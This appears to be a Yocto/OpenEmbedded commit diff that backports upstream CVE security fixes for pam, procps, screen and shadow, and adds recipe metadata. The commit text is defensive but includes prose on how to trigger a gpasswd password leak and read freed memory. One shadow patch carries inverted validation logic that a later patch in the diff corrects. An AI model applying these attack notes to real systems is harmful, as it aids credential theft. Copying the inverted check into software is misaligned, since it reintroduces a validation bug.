--- a/meta/recipes-extended/mingetty/mingetty_1.08.bb
+++ b/meta/recipes-extended/mingetty/mingetty_1.08.bb
@@ -1,6 +1,7 @@
1SUMMARY = "Compact getty terminal handler for virtual consoles only" 1SUMMARY = "Compact getty terminal handler for virtual consoles only"
2SECTION = "console/utils" 2SECTION = "console/utils"
3HOMEPAGE = "http://sourceforge.net/projects/mingetty/" 3HOMEPAGE = "http://sourceforge.net/projects/mingetty/"
4DESCRIPTION = "This is a small Linux console getty that is started on the Linux text console, asks for a login name and then tranfers over to login directory. Is extended to allow automatic login and starting any app."
4LICENSE = "GPLv2" 5LICENSE = "GPLv2"
5PR = "r3" 6PR = "r3"
6 7
diff --git a/meta/recipes-extended/newt/libnewt_0.52.21.bb b/meta/recipes-extended/newt/libnewt_0.52.21.bb
index 88b4cf4a03..3d35a17c92 100644
--- a/meta/recipes-extended/newt/libnewt_0.52.21.bb
+++ b/meta/recipes-extended/newt/libnewt_0.52.21.bb
@@ -29,7 +29,7 @@ SRC_URI[sha256sum] = "265eb46b55d7eaeb887fca7a1d51fe115658882dfe148164b6c49fccac
29 29
30S = "${WORKDIR}/newt-${PV}" 30S = "${WORKDIR}/newt-${PV}"
31 31
32inherit autotools-brokensep python3native python3-dir 32inherit autotools-brokensep python3native python3-dir python3targetconfig
33 33
34EXTRA_OECONF = "--without-tcl --with-python" 34EXTRA_OECONF = "--without-tcl --with-python"
35 35
diff --git a/meta/recipes-extended/pam/libpam/CVE-2024-22365.patch b/meta/recipes-extended/pam/libpam/CVE-2024-22365.patch
new file mode 100644
index 0000000000..33ac37b7f0
--- /dev/null
+++ b/meta/recipes-extended/pam/libpam/CVE-2024-22365.patch
@@ -0,0 +1,59 @@
1From 031bb5a5d0d950253b68138b498dc93be69a64cb Mon Sep 17 00:00:00 2001
2From: Matthias Gerstner <matthias.gerstner@suse.de>
3Date: Wed, 27 Dec 2023 14:01:59 +0100
4Subject: [PATCH] pam_namespace: protect_dir(): use O_DIRECTORY to prevent
5 local DoS situations
6
7Without O_DIRECTORY the path crawling logic is subject to e.g. FIFOs
8being placed in user controlled directories, causing the PAM module to
9block indefinitely during `openat()`.
10
11Pass O_DIRECTORY to cause the `openat()` to fail if the path does not
12refer to a directory.
13
14With this the check whether the final path element is a directory
15becomes unnecessary, drop it.
16
17Upstream-Status: Backport [https://github.com/linux-pam/linux-pam/commit/031bb5a5d0d950253b68138b498dc93be69a64cb]
18CVE: CVE-2024-22365
19Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
20---
21 modules/pam_namespace/pam_namespace.c | 18 +-----------------
22 1 file changed, 1 insertion(+), 17 deletions(-)
23
24diff --git a/modules/pam_namespace/pam_namespace.c b/modules/pam_namespace/pam_namespace.c
25index 2528cff86..f72d67189 100644
26--- a/modules/pam_namespace/pam_namespace.c
27+++ b/modules/pam_namespace/pam_namespace.c
28@@ -1201,7 +1201,7 @@ static int protect_dir(const char *path, mode_t mode, int do_mkdir,
29 int dfd = AT_FDCWD;
30 int dfd_next;
31 int save_errno;
32- int flags = O_RDONLY;
33+ int flags = O_RDONLY | O_DIRECTORY;
34 int rv = -1;
35 struct stat st;
36
37@@ -1255,22 +1255,6 @@ static int protect_dir(const char *path, mode_t mode, int do_mkdir,
38 rv = openat(dfd, dir, flags);
39 }
40
41- if (rv != -1) {
42- if (fstat(rv, &st) != 0) {
43- save_errno = errno;
44- close(rv);
45- rv = -1;
46- errno = save_errno;
47- goto error;
48- }
49- if (!S_ISDIR(st.st_mode)) {
50- close(rv);
51- errno = ENOTDIR;
52- rv = -1;
53- goto error;
54- }
55- }
56-
57 if (flags & O_NOFOLLOW) {
58 /* we are inside user-owned dir - protect */
59 if (protect_mount(rv, p, idata) == -1) {
diff --git a/meta/recipes-extended/pam/libpam_1.3.1.bb b/meta/recipes-extended/pam/libpam_1.3.1.bb
index bc72afe6ad..527a368e2d 100644
--- a/meta/recipes-extended/pam/libpam_1.3.1.bb
+++ b/meta/recipes-extended/pam/libpam_1.3.1.bb
@@ -24,6 +24,7 @@ SRC_URI = "https://github.com/linux-pam/linux-pam/releases/download/v${PV}/Linux
24 file://pam-security-abstract-securetty-handling.patch \ 24 file://pam-security-abstract-securetty-handling.patch \
25 file://pam-unix-nullok-secure.patch \ 25 file://pam-unix-nullok-secure.patch \
26 file://crypt_configure.patch \ 26 file://crypt_configure.patch \
27 file://CVE-2024-22365.patch \
27 " 28 "
28 29
29SRC_URI[md5sum] = "558ff53b0fc0563ca97f79e911822165" 30SRC_URI[md5sum] = "558ff53b0fc0563ca97f79e911822165"
diff --git a/meta/recipes-extended/parted/parted_3.3.bb b/meta/recipes-extended/parted/parted_3.3.bb
index aa4d8042cf..2d688c3700 100644
--- a/meta/recipes-extended/parted/parted_3.3.bb
+++ b/meta/recipes-extended/parted/parted_3.3.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Disk partition editing/resizing utility" 1SUMMARY = "Disk partition editing/resizing utility"
2HOMEPAGE = "http://www.gnu.org/software/parted/parted.html" 2HOMEPAGE = "http://www.gnu.org/software/parted/parted.html"
3DESCRIPTION = "GNU Parted manipulates partition tables. This is useful for creating space for new operating systems, reorganizing disk usage, copying data on hard disks and disk imaging."
3LICENSE = "GPLv3+" 4LICENSE = "GPLv3+"
4LIC_FILES_CHKSUM = "file://COPYING;md5=2f31b266d3440dd7ee50f92cf67d8e6c" 5LIC_FILES_CHKSUM = "file://COPYING;md5=2f31b266d3440dd7ee50f92cf67d8e6c"
5SECTION = "console/tools" 6SECTION = "console/tools"
diff --git a/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb b/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb
index 9f992d3e83..409a8f3896 100644
--- a/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb
+++ b/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb
@@ -1,5 +1,7 @@
1SUMMARY = "Convert::ASN1 - Perl ASN.1 Encode/Decode library" 1SUMMARY = "Convert::ASN1 - Perl ASN.1 Encode/Decode library"
2SECTION = "libs" 2SECTION = "libs"
3HOMEPAGE = "https://metacpan.org/source/GBARR/Convert-ASN1-0.27"
4DESCRIPTION = "Convert::ASN1 is a perl library for encoding/decoding data using ASN.1 definitions."
3LICENSE = "Artistic-1.0 | GPL-1.0+" 5LICENSE = "Artistic-1.0 | GPL-1.0+"
4LIC_FILES_CHKSUM = "file://README.md;beginline=91;endline=97;md5=ceff7fd286eb6d8e8e0d3d23e096a63f" 6LIC_FILES_CHKSUM = "file://README.md;beginline=91;endline=97;md5=ceff7fd286eb6d8e8e0d3d23e096a63f"
5 7
diff --git a/meta/recipes-extended/perl/libtimedate-perl_2.30.bb b/meta/recipes-extended/perl/libtimedate-perl_2.30.bb
index 7219c7d11e..068f0bd3f3 100644
--- a/meta/recipes-extended/perl/libtimedate-perl_2.30.bb
+++ b/meta/recipes-extended/perl/libtimedate-perl_2.30.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Perl modules useful for manipulating date and time information" 1SUMMARY = "Perl modules useful for manipulating date and time information"
2HOMEPAGE = "https://metacpan.org/release/TimeDate" 2HOMEPAGE = "https://metacpan.org/release/TimeDate"
3DESCRIPTION = "This is the perl5 TimeDate distribution. It requires perl version 5.003 or later."
3SECTION = "libs" 4SECTION = "libs"
4# You can redistribute it and/or modify it under the same terms as Perl itself. 5# You can redistribute it and/or modify it under the same terms as Perl itself.
5LICENSE = "Artistic-1.0 | GPL-1.0+" 6LICENSE = "Artistic-1.0 | GPL-1.0+"
diff --git a/meta/recipes-extended/procps/procps/CVE-2023-4016.patch b/meta/recipes-extended/procps/procps/CVE-2023-4016.patch
new file mode 100644
index 0000000000..50582a8649
--- /dev/null
+++ b/meta/recipes-extended/procps/procps/CVE-2023-4016.patch
@@ -0,0 +1,85 @@
1From 2c933ecba3bb1d3041a5a7a53a7b4078a6003413 Mon Sep 17 00:00:00 2001
2From: Craig Small <csmall@dropbear.xyz>
3Date: Thu, 10 Aug 2023 21:18:38 +1000
4Subject: [PATCH] ps: Fix possible buffer overflow in -C option
5
6ps allocates memory using malloc(length of arg * len of struct).
7In certain strange circumstances, the arg length could be very large
8and the multiplecation will overflow, allocating a small amount of
9memory.
10
11Subsequent strncpy() will then write into unallocated memory.
12The fix is to use calloc. It's slower but this is a one-time
13allocation. Other malloc(x * y) calls have also been replaced
14by calloc(x, y)
15
16References:
17 https://www.freelists.org/post/procps/ps-buffer-overflow-CVE-20234016
18 https://nvd.nist.gov/vuln/detail/CVE-2023-4016
19 https://gitlab.com/procps-ng/procps/-/issues/297
20 https://bugs.debian.org/1042887
21
22Signed-off-by: Craig Small <csmall@dropbear.xyz>
23
24CVE: CVE-2023-4016
25Upstream-Status: Backport [https://gitlab.com/procps-ng/procps/-/commit/2c933ecba3bb1d3041a5a7a53a7b4078a6003413]
26
27Signed-off-by: Peter Marko <peter.marko@siemens.com>
28
29---
30 NEWS | 1 +
31 ps/parser.c | 8 ++++----
32 2 files changed, 5 insertions(+), 4 deletions(-)
33
34diff --git a/NEWS b/NEWS
35index b9509734..64fa3da8 100644
36--- a/NEWS
37+++ b/NEWS
38@@ -1,3 +1,5 @@
39+ * ps: Fix buffer overflow in -C option CVE-2023-4016 Debian #1042887, issue #297
40+
41 procps-ng-3.3.16
42 ----------------
43 * library: Increment to 8:2:0
44diff --git a/ps/parser.c b/ps/parser.c
45index 248aa741..15873dfa 100644
46--- a/ps/parser.c
47+++ b/ps/parser.c
48@@ -184,7 +184,6 @@ static const char *parse_list(const char *arg, const char *(*parse_fn)(char *, s
49 const char *err; /* error code that could or did happen */
50 /*** prepare to operate ***/
51 node = malloc(sizeof(selection_node));
52- node->u = malloc(strlen(arg)*sizeof(sel_union)); /* waste is insignificant */
53 node->n = 0;
54 buf = strdup(arg);
55 /*** sanity check and count items ***/
56@@ -205,6 +204,7 @@ static const char *parse_list(const char *arg, const char *(*parse_fn)(char *, s
57 } while (*++walk);
58 if(need_item) goto parse_error;
59 node->n = items;
60+ node->u = calloc(items, sizeof(sel_union));
61 /*** actually parse the list ***/
62 walk = buf;
63 while(items--){
64@@ -1031,15 +1031,15 @@ static const char *parse_trailing_pids(void){
65 thisarg = ps_argc - 1; /* we must be at the end now */
66
67 pidnode = malloc(sizeof(selection_node));
68- pidnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */
69+ pidnode->u = calloc(i, sizeof(sel_union)); /* waste is insignificant */
70 pidnode->n = 0;
71
72 grpnode = malloc(sizeof(selection_node));
73- grpnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */
74+ grpnode->u = calloc(i,sizeof(sel_union)); /* waste is insignificant */
75 grpnode->n = 0;
76
77 sidnode = malloc(sizeof(selection_node));
78- sidnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */
79+ sidnode->u = calloc(i, sizeof(sel_union)); /* waste is insignificant */
80 sidnode->n = 0;
81
82 while(i--){
83--
84GitLab
85
diff --git a/meta/recipes-extended/procps/procps_3.3.16.bb b/meta/recipes-extended/procps/procps_3.3.16.bb
index 2810ebd285..ac27734a6f 100644
--- a/meta/recipes-extended/procps/procps_3.3.16.bb
+++ b/meta/recipes-extended/procps/procps_3.3.16.bb
@@ -12,8 +12,9 @@ DEPENDS = "ncurses"
12 12
13inherit autotools gettext pkgconfig update-alternatives 13inherit autotools gettext pkgconfig update-alternatives
14 14
15SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https \ 15SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https;branch=master \
16 file://sysctl.conf \ 16 file://sysctl.conf \
17 file://CVE-2023-4016.patch \
17 " 18 "
18SRCREV = "59c88e18f29000ceaf7e5f98181b07be443cf12f" 19SRCREV = "59c88e18f29000ceaf7e5f98181b07be443cf12f"
19 20
diff --git a/meta/recipes-extended/psmisc/psmisc_23.3.bb b/meta/recipes-extended/psmisc/psmisc_23.3.bb
index e569f1074b..36e6775f9e 100644
--- a/meta/recipes-extended/psmisc/psmisc_23.3.bb
+++ b/meta/recipes-extended/psmisc/psmisc_23.3.bb
@@ -2,7 +2,7 @@ require psmisc.inc
2LICENSE = "GPLv2" 2LICENSE = "GPLv2"
3LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3" 3LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3"
4 4
5SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https \ 5SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https;branch=master \
6 file://0001-Use-UINTPTR_MAX-instead-of-__WORDSIZE.patch \ 6 file://0001-Use-UINTPTR_MAX-instead-of-__WORDSIZE.patch \
7 " 7 "
8SRCREV = "78bde849041e6c914a2a517ebe1255b86dc98772" 8SRCREV = "78bde849041e6c914a2a517ebe1255b86dc98772"
diff --git a/meta/recipes-extended/quota/quota_4.05.bb b/meta/recipes-extended/quota/quota_4.05.bb
index c5da1e71ed..46ad7352d6 100644
--- a/meta/recipes-extended/quota/quota_4.05.bb
+++ b/meta/recipes-extended/quota/quota_4.05.bb
@@ -1,6 +1,7 @@
1SUMMARY = "Tools for monitoring & limiting user disk usage per filesystem" 1SUMMARY = "Tools for monitoring & limiting user disk usage per filesystem"
2SECTION = "base" 2SECTION = "base"
3HOMEPAGE = "http://sourceforge.net/projects/linuxquota/" 3HOMEPAGE = "http://sourceforge.net/projects/linuxquota/"
4DESCRIPTION = "Tools and patches for the Linux Diskquota system as part of the Linux kernel"
4BUGTRACKER = "http://sourceforge.net/tracker/?group_id=18136&atid=118136" 5BUGTRACKER = "http://sourceforge.net/tracker/?group_id=18136&atid=118136"
5LICENSE = "BSD & GPLv2+ & LGPLv2.1+" 6LICENSE = "BSD & GPLv2+ & LGPLv2.1+"
6LIC_FILES_CHKSUM = "file://rquota_server.c;beginline=1;endline=20;md5=fe7e0d7e11c6f820f8fa62a5af71230f \ 7LIC_FILES_CHKSUM = "file://rquota_server.c;beginline=1;endline=20;md5=fe7e0d7e11c6f820f8fa62a5af71230f \
diff --git a/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb b/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb
index cb5b288c48..0f8a6f74f8 100644
--- a/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb
+++ b/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb
@@ -19,7 +19,7 @@ PV = "1.4+git${SRCPV}"
19 19
20SRCREV = "9bc3b5b785723cfff459b0c01b39d87d4bed975c" 20SRCREV = "9bc3b5b785723cfff459b0c01b39d87d4bed975c"
21 21
22SRC_URI = "git://github.com/thkukuk/${BPN} \ 22SRC_URI = "git://github.com/thkukuk/${BPN};branch=master;protocol=https \
23 file://0001-Use-cross-compiled-rpcgen.patch \ 23 file://0001-Use-cross-compiled-rpcgen.patch \
24 " 24 "
25 25
diff --git a/meta/recipes-extended/screen/screen/CVE-2021-26937.patch b/meta/recipes-extended/screen/screen/CVE-2021-26937.patch
new file mode 100644
index 0000000000..983b35c1b0
--- /dev/null
+++ b/meta/recipes-extended/screen/screen/CVE-2021-26937.patch
@@ -0,0 +1,68 @@
1Description: [CVE-2021-26937] Fix out of bounds array access
2Author: Michael Schröder <mls@suse.de>
3Bug-Debian: https://bugs.debian.org/982435
4Bug: https://savannah.gnu.org/bugs/?60030
5Bug: https://lists.gnu.org/archive/html/screen-devel/2021-02/msg00000.html
6Bug-OSS-Security: https://www.openwall.com/lists/oss-security/2021/02/09/3
7Origin: https://lists.gnu.org/archive/html/screen-devel/2021-02/msg00010.html
8
9CVE: CVE-2021-26937
10Upstream-Status: Pending
11Signed-off-by: Scott Murray <scott.murray@konsulko.com>
12
13--- a/encoding.c
14+++ b/encoding.c
15@@ -43,7 +43,7 @@
16 # ifdef UTF8
17 static int recode_char __P((int, int, int));
18 static int recode_char_to_encoding __P((int, int));
19-static void comb_tofront __P((int, int));
20+static void comb_tofront __P((int));
21 # ifdef DW_CHARS
22 static int recode_char_dw __P((int, int *, int, int));
23 static int recode_char_dw_to_encoding __P((int, int *, int));
24@@ -1263,6 +1263,8 @@
25 {0x30000, 0x3FFFD},
26 };
27
28+ if (c >= 0xdf00 && c <= 0xdfff)
29+ return 1; /* dw combining sequence */
30 return ((bisearch(c, wide, sizeof(wide) / sizeof(struct interval) - 1)) ||
31 (cjkwidth &&
32 bisearch(c, ambiguous,
33@@ -1330,11 +1332,12 @@
34 }
35
36 static void
37-comb_tofront(root, i)
38-int root, i;
39+comb_tofront(i)
40+int i;
41 {
42 for (;;)
43 {
44+ int root = i >= 0x700 ? 0x801 : 0x800;
45 debug1("bring to front: %x\n", i);
46 combchars[combchars[i]->prev]->next = combchars[i]->next;
47 combchars[combchars[i]->next]->prev = combchars[i]->prev;
48@@ -1396,9 +1399,9 @@
49 {
50 /* full, recycle old entry */
51 if (c1 >= 0xd800 && c1 < 0xe000)
52- comb_tofront(root, c1 - 0xd800);
53+ comb_tofront(c1 - 0xd800);
54 i = combchars[root]->prev;
55- if (c1 == i + 0xd800)
56+ if (i == 0x800 || i == 0x801 || c1 == i + 0xd800)
57 {
58 /* completely full, can't recycle */
59 debug("utf8_handle_comp: completely full!\n");
60@@ -1422,7 +1425,7 @@
61 mc->font = (i >> 8) + 0xd8;
62 mc->fontx = 0;
63 debug3("combinig char %x %x -> %x\n", c1, c, i + 0xd800);
64- comb_tofront(root, i);
65+ comb_tofront(i);
66 }
67
68 #else /* !UTF8 */
diff --git a/meta/recipes-extended/screen/screen/CVE-2023-24626.patch b/meta/recipes-extended/screen/screen/CVE-2023-24626.patch
new file mode 100644
index 0000000000..73caf9d81b
--- /dev/null
+++ b/meta/recipes-extended/screen/screen/CVE-2023-24626.patch
@@ -0,0 +1,40 @@
1From e9ad41bfedb4537a6f0de20f00b27c7739f168f7 Mon Sep 17 00:00:00 2001
2From: Alexander Naumov <alexander_naumov@opensuse.org>
3Date: Mon, 30 Jan 2023 17:22:25 +0200
4Subject: fix: missing signal sending permission check on failed query messages
5
6Signed-off-by: Alexander Naumov <alexander_naumov@opensuse.org>
7
8CVE: CVE-2023-24626
9Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/screen.git/commit/?id=e9ad41bfedb4537a6f0de20f00b27c7739f168f7]
10Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
11---
12 socket.c | 9 +++++++--
13 1 file changed, 7 insertions(+), 2 deletions(-)
14
15diff --git a/socket.c b/socket.c
16index bb68b35..9d87445 100644
17--- a/socket.c
18+++ b/socket.c
19@@ -1285,11 +1285,16 @@ ReceiveMsg()
20 else
21 queryflag = -1;
22
23- Kill(m.m.command.apid,
24+ if (CheckPid(m.m.command.apid)) {
25+ Msg(0, "Query attempt with bad pid(%d)!", m.m.command.apid);
26+ }
27+ else {
28+ Kill(m.m.command.apid,
29 (queryflag >= 0)
30 ? SIGCONT
31 : SIG_BYE); /* Send SIG_BYE if an error happened */
32- queryflag = -1;
33+ queryflag = -1;
34+ }
35 }
36 break;
37 case MSG_COMMAND:
38--
392.25.1
40
diff --git a/meta/recipes-extended/screen/screen_4.8.0.bb b/meta/recipes-extended/screen/screen_4.8.0.bb
index 4772eb6c7a..c4faa27023 100644
--- a/meta/recipes-extended/screen/screen_4.8.0.bb
+++ b/meta/recipes-extended/screen/screen_4.8.0.bb
@@ -21,6 +21,8 @@ SRC_URI = "${GNU_MIRROR}/screen/screen-${PV}.tar.gz \
21 file://0002-comm.h-now-depends-on-term.h.patch \ 21 file://0002-comm.h-now-depends-on-term.h.patch \
22 file://0001-fix-for-multijob-build.patch \ 22 file://0001-fix-for-multijob-build.patch \
23 file://0001-Remove-more-compatibility-stuff.patch \ 23 file://0001-Remove-more-compatibility-stuff.patch \
24 file://CVE-2021-26937.patch \
25 file://CVE-2023-24626.patch \
24 " 26 "
25 27
26SRC_URI[md5sum] = "d276213d3acd10339cd37848b8c4ab1e" 28SRC_URI[md5sum] = "d276213d3acd10339cd37848b8c4ab1e"
diff --git a/meta/recipes-extended/sed/sed_4.8.bb b/meta/recipes-extended/sed/sed_4.8.bb
index 39e3a61df5..089bd11a55 100644
--- a/meta/recipes-extended/sed/sed_4.8.bb
+++ b/meta/recipes-extended/sed/sed_4.8.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Stream EDitor (text filtering utility)" 1SUMMARY = "Stream EDitor (text filtering utility)"
2HOMEPAGE = "http://www.gnu.org/software/sed/" 2HOMEPAGE = "http://www.gnu.org/software/sed/"
3DESCRIPTION = "sed (stream editor) is a non-interactive command-line text editor."
3LICENSE = "GPLv3+" 4LICENSE = "GPLv3+"
4LIC_FILES_CHKSUM = "file://COPYING;md5=c678957b0c8e964aa6c70fd77641a71e \ 5LIC_FILES_CHKSUM = "file://COPYING;md5=c678957b0c8e964aa6c70fd77641a71e \
5 file://sed/sed.h;beginline=1;endline=15;md5=fb3c7e6fbca6f66943859153d4be8efe \ 6 file://sed/sed.h;beginline=1;endline=15;md5=fb3c7e6fbca6f66943859153d4be8efe \
diff --git a/meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch b/meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch
new file mode 100644
index 0000000000..aea07ff361
--- /dev/null
+++ b/meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch
@@ -0,0 +1,66 @@
1From 2eaea70111f65b16d55998386e4ceb4273c19eb4 Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Christian=20G=C3=B6ttsche?= <cgzones@googlemail.com>
3Date: Fri, 31 Mar 2023 14:46:50 +0200
4Subject: [PATCH] Overhaul valid_field()
5
6e5905c4b ("Added control character check") introduced checking for
7control characters but had the logic inverted, so it rejects all
8characters that are not control ones.
9
10Cast the character to `unsigned char` before passing to the character
11checking functions to avoid UB.
12
13Use strpbrk(3) for the illegal character test and return early.
14
15Upstream-Status: Backport [https://github.com/shadow-maint/shadow/commit/2eaea70111f65b16d55998386e4ceb4273c19eb4]
16
17Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
18Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
19---
20 lib/fields.c | 24 ++++++++++--------------
21 1 file changed, 10 insertions(+), 14 deletions(-)
22
23diff --git a/lib/fields.c b/lib/fields.c
24index fb51b582..53929248 100644
25--- a/lib/fields.c
26+++ b/lib/fields.c
27@@ -37,26 +37,22 @@ int valid_field (const char *field, const char *illegal)
28
29 /* For each character of field, search if it appears in the list
30 * of illegal characters. */
31+ if (illegal && NULL != strpbrk (field, illegal)) {
32+ return -1;
33+ }
34+
35+ /* Search if there are non-printable or control characters */
36 for (cp = field; '\0' != *cp; cp++) {
37- if (strchr (illegal, *cp) != NULL) {
38+ unsigned char c = *cp;
39+ if (!isprint (c)) {
40+ err = 1;
41+ }
42+ if (iscntrl (c)) {
43 err = -1;
44 break;
45 }
46 }
47
48- if (0 == err) {
49- /* Search if there are non-printable or control characters */
50- for (cp = field; '\0' != *cp; cp++) {
51- if (!isprint (*cp)) {
52- err = 1;
53- }
54- if (!iscntrl (*cp)) {
55- err = -1;
56- break;
57- }
58- }
59- }
60-
61 return err;
62 }
63
64--
652.34.1
66
diff --git a/meta/recipes-extended/shadow/files/CVE-2023-29383.patch b/meta/recipes-extended/shadow/files/CVE-2023-29383.patch
new file mode 100644
index 0000000000..dbf4a508e9
--- /dev/null
+++ b/meta/recipes-extended/shadow/files/CVE-2023-29383.patch
@@ -0,0 +1,54 @@
1From e5905c4b84d4fb90aefcd96ee618411ebfac663d Mon Sep 17 00:00:00 2001
2From: tomspiderlabs <128755403+tomspiderlabs@users.noreply.github.com>
3Date: Thu, 23 Mar 2023 23:39:38 +0000
4Subject: [PATCH] Added control character check
5
6Added control character check, returning -1 (to "err") if control characters are present.
7
8CVE: CVE-2023-29383
9Upstream-Status: Backport
10
11Reference to upstream:
12https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d
13
14Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
15Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
16---
17 lib/fields.c | 11 +++++++----
18 1 file changed, 7 insertions(+), 4 deletions(-)
19
20diff --git a/lib/fields.c b/lib/fields.c
21index 640be931..fb51b582 100644
22--- a/lib/fields.c
23+++ b/lib/fields.c
24@@ -21,9 +21,9 @@
25 *
26 * The supplied field is scanned for non-printable and other illegal
27 * characters.
28- * + -1 is returned if an illegal character is present.
29- * + 1 is returned if no illegal characters are present, but the field
30- * contains a non-printable character.
31+ * + -1 is returned if an illegal or control character is present.
32+ * + 1 is returned if no illegal or control characters are present,
33+ * but the field contains a non-printable character.
34 * + 0 is returned otherwise.
35 */
36 int valid_field (const char *field, const char *illegal)
37@@ -45,10 +45,13 @@ int valid_field (const char *field, const char *illegal)
38 }
39
40 if (0 == err) {
41- /* Search if there are some non-printable characters */
42+ /* Search if there are non-printable or control characters */
43 for (cp = field; '\0' != *cp; cp++) {
44 if (!isprint (*cp)) {
45 err = 1;
46+ }
47+ if (!iscntrl (*cp)) {
48+ err = -1;
49 break;
50 }
51 }
52--
532.34.1
54
diff --git a/meta/recipes-extended/shadow/files/CVE-2023-4641.patch b/meta/recipes-extended/shadow/files/CVE-2023-4641.patch
new file mode 100644
index 0000000000..75dbbad299
--- /dev/null
+++ b/meta/recipes-extended/shadow/files/CVE-2023-4641.patch
@@ -0,0 +1,146 @@
1From 51731b01fd9a608397da22b7b9164e4996f3d4c6 Mon Sep 17 00:00:00 2001
2From: Alejandro Colomar <alx@kernel.org>
3Date: Sat, 10 Jun 2023 16:20:05 +0200
4Subject: [PATCH] gpasswd(1): Fix password leak
5
6CVE: CVE-2023-4641
7Upstream-Status: Backport [https://github.com/shadow-maint/shadow/commit/65c88a43a23c2391dcc90c0abda3e839e9c57904]
8
9How to trigger this password leak?
10~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
11
12When gpasswd(1) asks for the new password, it asks twice (as is usual
13for confirming the new password). Each of those 2 password prompts
14uses agetpass() to get the password. If the second agetpass() fails,
15the first password, which has been copied into the 'static' buffer
16'pass' via STRFCPY(), wasn't being zeroed.
17
18agetpass() is defined in <./libmisc/agetpass.c> (around line 91), and
19can fail for any of the following reasons:
20
21- malloc(3) or readpassphrase(3) failure.
22
23 These are going to be difficult to trigger. Maybe getting the system
24 to the limits of memory utilization at that exact point, so that the
25 next malloc(3) gets ENOMEM, and possibly even the OOM is triggered.
26 About readpassphrase(3), ENFILE and EINTR seem the only plausible
27 ones, and EINTR probably requires privilege or being the same user;
28 but I wouldn't discard ENFILE so easily, if a process starts opening
29 files.
30
31- The password is longer than PASS_MAX.
32
33 The is plausible with physical access. However, at that point, a
34 keylogger will be a much simpler attack.
35
36And, the attacker must be able to know when the second password is being
37introduced, which is not going to be easy.
38
39How to read the password after the leak?
40~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
41
42Provoking the leak yourself at the right point by entering a very long
43password is easy, and inspecting the process stack at that point should
44be doable. Try to find some consistent patterns.
45
46Then, search for those patterns in free memory, right after the victim
47leaks their password.
48
49Once you get the leak, a program should read all the free memory
50searching for patterns that gpasswd(1) leaves nearby the leaked
51password.
52
53On 6/10/23 03:14, Seth Arnold wrote:
54> An attacker process wouldn't be able to use malloc(3) for this task.
55> There's a handful of tools available for userspace to allocate memory:
56>
57> - brk / sbrk
58> - mmap MAP_ANONYMOUS
59> - mmap /dev/zero
60> - mmap some other file
61> - shm_open
62> - shmget
63>
64> Most of these return only pages of zeros to a process. Using mmap of an
65> existing file, you can get some of the contents of the file demand-loaded
66> into the memory space on the first use.
67>
68> The MAP_UNINITIALIZED flag only works if the kernel was compiled with
69> CONFIG_MMAP_ALLOW_UNINITIALIZED. This is rare.
70>
71> malloc(3) doesn't zero memory, to our collective frustration, but all the
72> garbage in the allocations is from previous allocations in the current
73> process. It isn't leftover from other processes.
74>
75> The avenues available for reading the memory:
76> - /dev/mem and /dev/kmem (requires root, not available with Secure Boot)
77> - /proc/pid/mem (requires ptrace privileges, mediated by YAMA)
78> - ptrace (requires ptrace privileges, mediated by YAMA)
79> - causing memory to be swapped to disk, and then inspecting the swap
80>
81> These all require a certain amount of privileges.
82
83How to fix it?
84~~~~~~~~~~~~~~
85
86memzero(), which internally calls explicit_bzero(3), or whatever
87alternative the system provides with a slightly different name, will
88make sure that the buffer is zeroed in memory, and optimizations are not
89allowed to impede this zeroing.
90
91This is not really 100% effective, since compilers may place copies of
92the string somewhere hidden in the stack. Those copies won't get zeroed
93by explicit_bzero(3). However, that's arguably a compiler bug, since
94compilers should make everything possible to avoid optimizing strings
95that are later passed to explicit_bzero(3). But we all know that
96sometimes it's impossible to have perfect knowledge in the compiler, so
97this is plausible. Nevertheless, there's nothing we can do against such
98issues, except minimizing the time such passwords are stored in plain
99text.
100
101Security concerns
102~~~~~~~~~~~~~~~~~
103
104We believe this isn't easy to exploit. Nevertheless, and since the fix
105is trivial, this fix should probably be applied soon, and backported to
106all supported distributions, to prevent someone else having more
107imagination than us to find a way.
108
109Affected versions
110~~~~~~~~~~~~~~~~~
111
112All. Bug introduced in shadow 19990709. That's the second commit in
113the git history.
114
115Fixes: 45c6603cc86c ("[svn-upgrade] Integrating new upstream version, shadow (19990709)")
116Reported-by: Alejandro Colomar <alx@kernel.org>
117Cc: Serge Hallyn <serge@hallyn.com>
118Cc: Iker Pedrosa <ipedrosa@redhat.com>
119Cc: Seth Arnold <seth.arnold@canonical.com>
120Cc: Christian Brauner <christian@brauner.io>
121Cc: Balint Reczey <rbalint@debian.org>
122Cc: Sam James <sam@gentoo.org>
123Cc: David Runge <dvzrv@archlinux.org>
